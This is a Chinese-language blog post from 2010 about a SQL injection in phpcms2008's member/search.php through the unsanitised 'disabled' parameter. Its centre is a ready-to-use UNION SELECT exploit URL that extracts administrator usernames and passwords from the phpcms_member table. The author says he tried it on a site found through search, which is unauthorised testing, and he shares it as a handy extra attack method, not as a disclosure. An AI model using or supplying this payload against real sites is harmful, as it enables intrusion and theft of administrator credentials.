一个尘封的phpcms2008注入

2010, February 3, 11:38 PM. 漏洞集研
Submitted by admin

今天翻硬盘看到以前一个phpcms2008的注入,这个注入有点滑稽,官方在9.23号发的补丁,但是之前之后都没有人大范围公开,可能是发现者通知了官方,也可能是其他原因,不得而知。
今天拿出来搜了个站测试了下,还可以成功。在此发出来,毕竟多一种手段,多一条路,谁也说不准什么时候能用上。(申明不是本事发现的)
member/search.php中的disabled未处理导致可以注入:

大小: 45.62 K
尺寸: 500 x 162
浏览: 47 次
点击打开新窗口浏览全图

注入过程由于需要一定的权限才可以搜索用户,所以需要注册一个一般的用户

大小: 49.74 K
尺寸: 500 x 316
浏览: 43 次
点击打开新窗口浏览全图

http://www.xxx.com/member/search ... on=&disabled=0/**/and/**/1=2/**/union/**/select/**/1,username,3,4,password,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 from phpcms_member where groupid=1/*

基本是可以注入成功的,接下来就不尝试了。
by tojen (在此感谢鸟哥,记得是鸟哥第一次和我起这个问题的)

« 上一篇 | 下一篇 »

Trackbacks
点击获得Trackback地址,Encode: UTF-8 点击获得Trackback地址,Encode: GB2312 or GBK 点击获得Trackback地址,Encode: BIG5
发表评论

评论内容 (必填):